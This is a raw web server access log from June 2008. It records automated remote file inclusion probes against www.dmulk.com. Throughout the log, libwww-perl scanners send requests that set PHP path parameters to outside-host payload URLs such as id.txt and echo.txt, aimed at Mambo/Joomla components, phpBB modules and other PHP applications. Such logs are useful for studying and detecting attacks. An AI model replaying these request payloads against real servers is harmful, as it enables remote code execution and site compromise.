79.171.18.36 - - [25/Jun/2008:11:37:26 -0700] "GET /logs/access_080321.log//components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:37:49 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:37:50 -0700] "GET /config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:37:50 -0700] "GET /logs/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:37:51 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:11:37:51 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:11:37:51 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:37:52 -0700] "GET /config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:37:52 -0700] "GET /logs/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:37:53 -0700] "GET /logs/access_080120.log/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:11:37:55 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:11:37:55 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 200 18483 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:11:37:55 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:11:37:55 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:37:55 -0700] "GET /logs/access_080120.log/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:37:57 -0700] "GET /?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 18403 "-" "libwww-perl/5.65" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:38:02 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:38:02 -0700] "GET /config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:38:03 -0700] "GET /logs/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:38:05 -0700] "GET /logs/access_080108.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:38:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:38:06 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:38:07 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:38:07 -0700] "GET /config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:38:08 -0700] "GET /logs/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.78.4.202 - - [25/Jun/2008:11:38:15 -0700] "GET /logs/access_080212.log/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:11:38:25 -0700] "GET //doceboLms//class/class.dashboard_lms.php?where_framework=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.86.64 - - [25/Jun/2008:11:38:31 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.86.64 - - [25/Jun/2008:11:38:31 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.129.128.75 - - [25/Jun/2008:11:38:34 -0700] "GET /logs//atom.php5?page=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
78.129.128.75 - - [25/Jun/2008:11:38:34 -0700] "GET //atom.php5?page=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:38:50 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:38:50 -0700] "GET //config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:38:51 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:11:39:03 -0700] "GET /config.php?path_to_root=http://www.dutadewata.com/bot4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:39:30 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:39:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:11:39:42 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:11:39:42 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:11:39:42 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:39:43 -0700] "GET /logs/access_080225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:11:39:45 -0700] "GET /logs/phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:11:39:46 -0700] "GET /phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.203.122.236 - - [25/Jun/2008:11:39:48 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [25/Jun/2008:11:39:49 -0700] "GET /config.php?path_to_root=http://www.dutadewata.com/bot3-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:11:39:53 -0700] "GET /logs/access.log/index.php?pag=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:11:39:56 -0700] "GET /index.php?pag=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:11:39:56 -0700] "GET /logs/index.php?pag=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:11:40:07 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:11:40:07 -0700] "GET /logs/classes/core/language.php?rootdir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:11:40:07 -0700] "GET /classes/core/language.php?rootdir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:40:11 -0700] "GET /logs/access_080120.log/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:11:40:23 -0700] "GET /logs/access_080120.log/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:11:40:23 -0700] "GET /errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:23 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:11:40:23 -0700] "GET /logs/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:24 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:24 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:40:24 -0700] "GET /logs/access_080120.log/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
59.126.46.141 - - [25/Jun/2008:11:40:36 -0700] "GET /logs/access_080120.log/config.php?path_to_root=http://www.dutadewata.com/bot3-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:11:40:37 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:37 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:38 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:38 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:40 -0700] "GET /logs/access_080330.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:40 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:40:40 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:40:59 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:41:02 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:41:06 -0700] "GET /logs/access_080418.log//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:41:08 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:41:11 -0700] "GET /logs/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:41:11 -0700] "GET /mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:41:19 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:41:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:41:22 -0700] "GET /logs/access.log/db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:41:22 -0700] "GET /db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:41:23 -0700] "GET /logs/db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:41:26 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:41:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:41:43 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:41:45 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:41:48 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:11:41:56 -0700] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:11:42:02 -0700] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 200 18567 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:11:42:09 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:11:42:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:11:42:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:11:42:19 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:11:42:22 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:11:42:24 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:42:32 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:11:42:36 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:11:42:37 -0700] "GET /config.php?path_to_root=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:11:42:37 -0700] "GET /logs/config.php?path_to_root=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:42:45 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.posaelditaqui.com/DjViRuS/sex???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:42:45 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.posaelditaqui.com/DjViRuS/sex???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:11:43:16 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:43:17 -0700] "GET /logs/access.log/index.php?pag=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:43:20 -0700] "GET /index.php?pag=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 200 18415 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:43:21 -0700] "GET /logs/index.php?pag=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.62.227 - - [25/Jun/2008:11:43:36 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:11:43:41 -0700] "GET /logs//doceboLms//class/class.dashboard_lms.php?where_framework=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:11:43:52 -0700] "GET /logs/config.php?path_to_root=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:43:52 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.posaelditaqui.com/DjViRuS/sex???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:11:43:53 -0700] "GET /config.php?path_to_root=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:43:53 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.posaelditaqui.com/DjViRuS/sex???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:43:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.posaelditaqui.com/DjViRuS/sex???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.188.105.227 - - [25/Jun/2008:11:43:54 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:11:44:03 -0700] "GET /logs/access_080225.log/db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:04 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:08 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
